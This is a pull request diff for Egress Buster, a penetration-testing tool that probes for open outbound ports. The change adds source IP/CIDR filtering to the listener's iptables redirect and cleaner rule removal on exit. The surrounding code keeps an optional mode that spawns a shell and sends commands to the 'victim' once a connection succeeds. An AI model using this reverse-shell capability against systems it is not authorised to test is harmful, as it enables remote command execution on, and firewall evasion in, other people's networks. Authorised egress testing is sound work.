### PR TITLE
Added ability to listen to a specific IP/CIDR

### DIFF
--- a/CHANGELOG
+++ b/CHANGELOG
@@ -1,11 +1,18 @@
 ~~~~~~~~~~~~
+version 0.3
+~~~~~~~~~~~~
+
+* added ability to listen to specific IP/CIDR
+* no longer flushes iptables when stopped
+
+~~~~~~~~~~~~
 version 0.2
 ~~~~~~~~~~~~
 
 * added full cd support so you can cd into directories with shells, etc. (thanks CG)
 * added ability to support all 65k ports, not just 1000 ports at a time. This will allow you to bust all ports all the time
 * added faster checking for ports for the egress bust
-* added optional flag for shell, so you can either A. just test ports or B. spawn a shell if a successful shell is established
+* added optional flag for shell, so you can either A. just test ports or B. spawn a shell if a successful connection is established
 * added new binary and put it under debugger detection to kill process
 
 ~~~~~~~~~~~~

--- a/egress_listener.py
+++ b/egress_listener.py
@@ -21,28 +21,31 @@ running = True
 try:
     ipaddr = sys.argv[1]
     eth = sys.argv[2]
+    srcipaddr = sys.argv[3]
 
 # if we didnt put anything in args
 except IndexError:
     print """
-Egress Buster v0.2 - Find open ports inside a network
+Egress Buster v0.3 - Find open ports inside a network
 
 This will route all ports to a local port and listen on every port. This
-means you can listen on all ports and do all ports as a way to egress bust.
+means you can listen on all ports and try all ports as a way to egress bust.
 
 Quick Egress Buster Listener written by: Dave Kennedy (@HackingDave) at TrustedSec
 
-Arguments: local listening ip, eth interface for listener, optional flag for shell
+Arguments: local listening ip, eth interface for listener, source ip to listen to, optional flag for shell
 
-Usage: $ python egress_listener.py <your_local_ip_addr> <eth_interface_for_listener> <optional_do_you_want_a_shell>
+Usage: $ python egress_listener.py <your_local_ip_addr> <eth_interface_for_listener> <source_ip_addr> <optional_do_you_want_a_shell>
 
-Example: $ python egress_listener.py 192.168.13.10 eth0 shell
+Set src_ip_to_listen_for to 0.0.0.0/0 to listen to connections from any IP, otherwise set a specific IP/CIDR and only connections from that source will be redirected to the listener.
+
+Example: $ python egress_listener.py 192.168.13.10 eth0 117.123.98.4 shell
         """
     sys.exit()
 
 # assign shell
 try:
-    shell = sys.argv[3]
+    shell = sys.argv[4]
 except:
     pass
 
@@ -52,7 +55,7 @@ class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
     # handle the packet
     def handle(self):
         self.data = self.request.recv(1024).strip()
-        print "[*] Connected from %s on port: TCP %s" % (self.client_address[0], self.data)
+        print "[*] Connected from %s on port: %s/tcp" % (self.client_address[0], self.data)
         if shell == "shell":
             while running:
                 request = raw_input("Enter the command to send to the victim: ")
@@ -74,10 +77,14 @@ class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pa
 if __name__ == "__main__":
 
     try:
-        print "[*] Inserting iptables rule to redirect **all TCP ports** to port TCP %s" % port
+        if srcipaddr == "0.0.0.0/0":
+            listening = "any IP"
+        else:
+            listening = srcipaddr
+
+        print "[*] Inserting iptables rule to redirect connections from %s to **all TCP ports** to Egress Buster port %s/tcp" % (listening, port)
         subprocess.Popen(
-            " iptables -t nat -A PREROUTING -i %s -p tcp  --dport 1:65535 -j DNAT --to-destination %s:%s" % (
-            eth, ipaddr, port), shell=True).wait()
+            "iptables -t nat -A PREROUTING -s %s -i %s -p tcp  --dport 1:65535 -j DNAT --to-destination %s:%s" % (srcipaddr, eth, ipaddr, port), shell=True).wait()
         # threaded server to handle multiple TCP connections
         socketserver = ThreadedTCPServer(('', port), ThreadedTCPRequestHandler)
         socketserver_thread = threading.Thread(target=socketserver.serve_forever)
@@ -93,8 +100,7 @@ if __name__ == "__main__":
     except Exception, e:
         print "[!] An issue occurred. Error: " + str(e)
     finally:
-        print "\n[*] Exiting, flushing iptables to remove entries."
-        subprocess.Popen("iptables -t nat -F", shell=True).wait()
-
+        print "\n[*] Exiting and removing iptables redirect rule."
+        subprocess.Popen("iptables -t nat -D PREROUTING -s %s -i %s -p tcp  --dport 1:65535 -j DNAT --to-destination %s:%s" % (srcipaddr, eth, ipaddr, port), shell=True).wait()
     print "[*] Done"
     sys.exit()

--- a/egressbuster.py
+++ b/egressbuster.py
@@ -43,12 +43,10 @@ A TrustedSec Project
 
 NOTE: Supports all 65536 TCP ports.
 
-Usage:
+Usage: $ egressbuster.py <listener_ip_address> <lowport-highport> (optional_flag_shell)
 
-Note that the last option is optional. If you want a shell to spawn when a port
-is detected, simply type shell as an optional flag.
-
-Usage: $ egressbuster.py <listener_ip_address> <lowport-highport> <optional_flag_shell>
+Note that the last flag is optional. If you want a shell to spawn when a port
+is detected, simply type 'shell' as the optional flag.
 
 Example: $ egressbuster.py 10.9.5.2 1-65536 shell
         """
@@ -71,7 +69,7 @@ def start_socket(ipaddr, base_port, shell):
         sockobj.connect((ipaddr, base_port))
         sockobj.send(str(base_port))
         sockobj.send('')
-        print "[*] Connection made to %s on port: TCP %s" % (ipaddr, base_port)
+        print "[*] Connection made to %s on port: %s/tcp" % (ipaddr, base_port)
         if shell == "shell":
             # start loop
             while 1:
@@ -111,7 +109,7 @@ def start_socket(ipaddr, base_port, shell):
     except timeout:
         sockobj.close()
         if verbose:
-            print "[v] Can't use port: TCP %s" % base_port
+            print "[v] Can't use port: %s/tcp" % base_port
 
 #    except Exception,e :
 #		print e
@@ -150,7 +148,7 @@ if end_port > 65536:
     end_port = 65536
 
 print "[i] Sending packets to egress listener (%s)..." % ipaddr
-print "[i] Starting at: TCP %s, ending at: TCP %s" % (base_port, end_port)
+print "[i] Starting at: %s/tcp, ending at: %s/tcp" % (base_port, end_port)
 
 while base_port <= end_port:
     thread.start_new_thread(start_socket, (ipaddr, base_port, shell))


### PR DESCRIPTION
It’s now possible to have only a given IP/CIDR redirected to the
listener. This is useful if you only want a specific IP to perform the
egress bust (i.e. during a penetration test), but more importantly it
means that the server can continue to be used normally (for other
tasks), as any other client connecting to the server’s services will
work as per normal. This allows Egress Buster to be used on a
multi-purpose server.

Also cleaned up the way the firewall rule is removed when Egress Buster
is stopped. It now cleanly removes the added rule instead of flushing
the entire iptables. Useful if the server relies on a rule set,
especially in a multi-purpose server scenario.
